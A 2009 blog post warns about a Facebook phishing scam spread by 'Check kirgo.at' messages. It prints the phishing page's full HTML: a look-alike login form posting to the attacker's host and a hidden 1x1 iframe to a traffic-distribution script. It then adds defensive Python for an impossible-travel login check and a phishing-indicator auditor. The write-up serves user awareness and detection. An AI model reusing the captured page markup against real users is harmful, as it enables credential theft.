Facebook Trojan Attack

This morning, I received a facebook message that was short and questionable: "Check kirgo.at." Interested, I visited the site, only to discover a poorly-disguised site attempting to look like a Facebook login page:

[Image: Fake Facebook Page]

While this page doesn't look very much like the real Facebook login page, and all of the links at the bottom go nowhere, some people are being caught by this trojan. They enter their Facebook credentials and their accounts are immediately compromised. Once compromised, their account sends a Facebook message to everyone in their Friends list with the same message ("Check X.at."). That's how the Trojan propagates.

Note that some people got this message in their email (because Facebook sends them a copy of their messages) and jumped to the page from there.

Here is the rule: Do not EVER give your Facebook credentials to any site other than Facebook, and do not follow a link to something that looks like Facebook and fill in your credentials. Period.

Update: Late today, Facebook added some additional controls to their login page in an effort to defeat the hackers, checking login attempts against the location from which the attempt is coming. This is a good first step for Facebook, who are still so new at the game that there are a number of security holes in their systems.
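
The location check described in the update can be built as an impossible-travel test on the login history. The Python below is an added example for this post, not Facebook's code: it compares a new attempt against the user's last successful login, denies when the implied travel speed is beyond an airliner's, and goes one step further than the post by asking for a second factor when the country has never been seen before. The coordinates, timestamps and the 900 km/h threshold are constructed assumptions.

```python
import math
from datetime import datetime, timedelta, timezone

# Assumption: anything faster than a long-haul airliner between two successful
# logins cannot be the same person carrying the same credentials.
MAX_PLAUSIBLE_SPEED_KMH = 900.0


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two lat/lon points."""
    earth_radius_km = 6371.0
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlambda = math.radians(lon2 - lon1)
    a = (math.sin(dphi / 2) ** 2
         + math.cos(phi1) * math.cos(phi2) * math.sin(dlambda / 2) ** 2)
    return 2 * earth_radius_km * math.asin(math.sqrt(a))


def assess_login(history, attempt):
    """Decide 'allow', 'challenge' (ask for a second factor) or 'deny'.

    history: prior successful logins, each {"ts", "lat", "lon", "country"}
             with the geolocation of the source IP as the risk engine saw it.
    attempt: the new login attempt in the same shape.
    """
    if not history:
        return "challenge"            # no baseline yet: verify out of band
    last = max(history, key=lambda h: h["ts"])
    distance = haversine_km(last["lat"], last["lon"], attempt["lat"], attempt["lon"])
    hours = (attempt["ts"] - last["ts"]).total_seconds() / 3600.0
    if hours > 0:
        speed = distance / hours
    else:                             # same instant: only a move is impossible
        speed = math.inf if distance > 0 else 0.0
    if speed > MAX_PLAUSIBLE_SPEED_KMH:
        return "deny"                 # impossible travel since the last login
    if attempt["country"] not in {h["country"] for h in history}:
        return "challenge"            # plausible trip, but a country never seen before
    return "allow"


# Constructed sample data: approximate city-centre coordinates, made-up timestamps.
_T0 = datetime(2009, 5, 21, 9, 0, tzinfo=timezone.utc)
HISTORY = [
    {"ts": _T0 - timedelta(days=3), "lat": 39.74, "lon": -104.99, "country": "US"},  # Denver
    {"ts": _T0, "lat": 39.74, "lon": -104.99, "country": "US"},                      # Denver
]
# The same account appears in London two hours after the Denver login (~7,500 km).
ATTEMPT_LONDON_2H = {"ts": _T0 + timedelta(hours=2), "lat": 51.51, "lon": -0.13, "country": "GB"}
# A London login 14 hours later is physically possible, but the country is new.
ATTEMPT_LONDON_14H = {"ts": _T0 + timedelta(hours=14), "lat": 51.51, "lon": -0.13, "country": "GB"}
# Another Denver login the next day.
ATTEMPT_DENVER_NEXT_DAY = {"ts": _T0 + timedelta(days=1), "lat": 39.74, "lon": -104.99, "country": "US"}

if __name__ == "__main__":
    for name, attempt in [("London +2h", ATTEMPT_LONDON_2H),
                          ("London +14h", ATTEMPT_LONDON_14H),
                          ("Denver +1d", ATTEMPT_DENVER_NEXT_DAY)]:
        print(name, "->", assess_login(HISTORY, attempt))
```

A real risk engine would feed the decision back into the login flow (a "deny" here would be a forced password reset and a notification to the account owner, since a credential phished this morning is what produces the impossible-travel pattern), and would use more of the history than just the last login.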

If you read HTML, the following is the complete HTML from the page as of 11:40am MDT on May 21, 2009:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
	<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
	<title>Login</title>
	<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z5LNJ/lpkg/56jyd27o/en_US/141/163305/css/aubdlzq1p80sw40o.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zC45Y/l/ecfhg87x/en_US/159827/css/login.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z252O/lpkg/zz2nmjbl/en_US/141/163009/css/a22nq2m07kocs00s.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z6WDZ/lpkg/6k6blvpv/en_US/141/164471/css/bjoirszhnfsoc88c.pkg.css" />
    <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/z32G8/lpkg/14ewl514/en_US/141/159058/css/9wzufavzfjcogsgk.pkg.css" />
</head>
<body class="login_page ie7 UIPage_LoggedOut Locale_en_US">
<div id="dropmenu_container"></div>
<div id="nonfooter">
	<div id="page_height" class="clearfix">
		<div id="menubar_container">
			<div id="fb_menubar" class="fb_menubar_logged_out clearfix">
				<div id="fb_menubar_core"><ul class="fb_menu_list"><li class="fb_menu" id="fb_menubar_logo" style="height:85px;"></li></ul></div>
				<div id="fb_menubar_aux"><ul class="fb_menu_list"></ul></div>
			</div>
			<div class="signup_box clearfix" style="height:25px;">
				<div class="UILinkButton UILinkButton_SUBig"><a href="/" class="UILinkButton_A">Sign Up</a>
					<div class="UILinkButton_RW">
						<div class="UILinkButton_R"></div>
					</div>
				</div>
				<span class="signup_box_message" style="padding-left:15px;">We helps you connect and share with the people in your life.</span></div></div><div id="content" class="fb_content"><div class="UIFullPage_Container"><div class="UIInterstitialContainer clearfix"><div class="UIRoundedTransparentBox"><div class="UIRoundedTransparentBox_Inner clearfix"><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_TL">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_TR">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_BL">&nbsp;</div><div class="UIRoundedTransparentBox_Corner UIRoundedTransparentBox_BR">&nbsp;</div><div class="UIRoundedTransparentBox_Border clearfix"><div class="UIInterstitialBox_Container clearfix"><div class="UIOneOff_Container">
				<div class="title_header add_border"><h2 class="no_icon">Login</h2></div>
				<form method="POST" action="/?login_attempt=1">
				<div id="loginform" style="">
				<div class="form_row clearfix "><label for="email" id="label_email">Email:</label><input type="text" class="inputtext" id="email" name="email" value="" /></div>
				<div class="form_row clearfix "><label for="pass" id="label_pass">Password:</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div>
				<label class="persistent"><input type="checkbox" class="inputcheckbox " name="persistent" value="1" /><span>Remember me</span></label>
				<div id="buttons" class="form_row clearfix"><label></label>
				<input type="submit" value="Login" name="login" id="login" class="inputsubmit" /></div><p class="reset_password form_row"><label></label><a href="/">Forgot your password?</a></p></div></form>
</div></div></div></div></div></div></div></div></div></div><br><br><div id="pagefooter"><div class="pagefooter_topborder clearfix"><div class="copyright_and_location clearfix"><div class="copyright" id="pagefooter_copyright"><span title="PHP"></span><span id="rtime" title="130">&copy;</span> <span title="10.18.7.118">20</span><span title="17409680">09</span></div>
</div><div id="pagefooter_links"><ul id="pagefooter_left_links"><li><a href="/">Login</a></li><li><a href="/">About</a></li><li><a href="/">Advertising</a></li><li><a href="/">Careers</a></li><li><a href="/">Terms</a></li></ul><ul id="pagefooter_right_links"><li><a href="/">Privacy</a></li><li><a href="/">Mobile</a></li><li><a href="/">Help</a></li></ul></div></div></div><iframe src='/tds/go.php?sid=2&pid=1431' width="1px" height="1px"></iframe><font></font><font></font><font></font><font></font>
</body>
</html>
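
Everything that gives this page away is visible in its source: a password form on a host that is not Facebook's, a form action that posts the credentials back to that same host, Facebook's own stylesheets hotlinked from fbcdn.net to borrow the look, footer links that all go to "/", and a 1x1 iframe pointing at a traffic-distribution script. The Python script below is an added example, not part of the original post, that checks a captured page for exactly those indicators. The embedded sample is a trimmed copy of the capture above; the set of hosts treated as the brand's legitimate login hosts and the asset-CDN suffixes are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts that legitimately serve the brand's login form, and the
# domain suffixes its own stylesheets are served from (the capture pulls CSS
# from b.static.ak.fbcdn.net).
BRAND_LOGIN_HOSTS = {"facebook.com", "www.facebook.com", "login.facebook.com"}
BRAND_ASSET_SUFFIXES = ("fbcdn.net", "facebook.com")


class LoginPageAuditor(HTMLParser):
    """Collects the page features the heuristics in audit_login_page() need."""

    def __init__(self):
        super().__init__()
        self.form_actions = []          # action attribute of every <form>
        self.password_fields = 0        # number of <input type="password">
        self.link_hrefs = []            # href of every <a>
        self.stylesheet_hosts = set()   # hostnames of external stylesheets
        self.tiny_iframes = []          # src of 0px/1px iframes (beacons, TDS hooks)

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_fields += 1
        elif tag == "a":
            self.link_hrefs.append(a.get("href", ""))
        elif tag == "link" and "stylesheet" in a.get("rel", "").lower():
            host = urlparse(a.get("href", "")).hostname
            if host:
                self.stylesheet_hosts.add(host)
        elif tag == "iframe":
            dims = (a.get("width", ""), a.get("height", ""))
            if any(d.lower().rstrip("px") in ("0", "1") for d in dims):
                self.tiny_iframes.append(a.get("src", ""))


def audit_login_page(html, page_host):
    """Return the list of indicator codes found in HTML served from page_host."""
    p = LoginPageAuditor()
    p.feed(html)
    p.close()
    findings = []
    host_is_brand = page_host in BRAND_LOGIN_HOSTS

    # 1. A password form on a host that is not the brand's login host.
    if p.password_fields and not host_is_brand:
        findings.append("password-form-on-non-brand-host")

    # 2. Where the credentials actually go: a relative action resolves to page_host.
    for action in p.form_actions:
        target = urlparse(action).hostname or page_host
        if target not in BRAND_LOGIN_HOSTS:
            findings.append("credentials-posted-to-non-brand-host")
            break

    # 3. Look-alike built by hotlinking the brand's own CSS from its CDN.
    if not host_is_brand and any(h.endswith(BRAND_ASSET_SUFFIXES) for h in p.stylesheet_hosts):
        findings.append("brand-assets-hotlinked")

    # 4. Navigation that goes nowhere: the clone only cares about the form.
    dead = [h for h in p.link_hrefs if h.strip() in ("", "/", "#")]
    if len(p.link_hrefs) >= 5 and len(dead) / len(p.link_hrefs) >= 0.8:
        findings.append("dead-footer-links")

    # 5. A 1x1 iframe is a tracking beacon or traffic-distribution hook.
    if p.tiny_iframes:
        findings.append("tracking-iframe")
    return findings


# Constructed sample: a trimmed copy of the captured page shown in the post.
CAPTURED_PAGE = """<html><head><title>Login</title>
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/zC45Y/l/ecfhg87x/en_US/159827/css/login.css" />
</head><body>
<a href="/">Sign Up</a>
<form method="POST" action="/?login_attempt=1">
<input type="text" name="email" /><input type="password" name="pass" />
<input type="submit" value="Login" name="login" />
<a href="/">Forgot your password?</a></form>
<ul><li><a href="/">Login</a></li><li><a href="/">About</a></li><li><a href="/">Terms</a></li>
<li><a href="/">Privacy</a></li><li><a href="/">Help</a></li></ul>
<iframe src='/tds/go.php?sid=2&pid=1431' width="1px" height="1px"></iframe>
</body></html>"""

if __name__ == "__main__":
    # The capture as served from kirgo.at, the domain named in the message.
    print(audit_login_page(CAPTURED_PAGE, "kirgo.at"))
```

Run against the capture as served from kirgo.at, all five indicators fire; the same HTML served from a brand host still trips the dead-links and hidden-iframe checks, which is the right outcome, since those two are suspicious on any login page. The host-based checks are the important ones for users: the credentials go wherever the form's action resolves, and here that is the phishing domain itself.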

This is not the only domain name that is attempting this, either, so beware!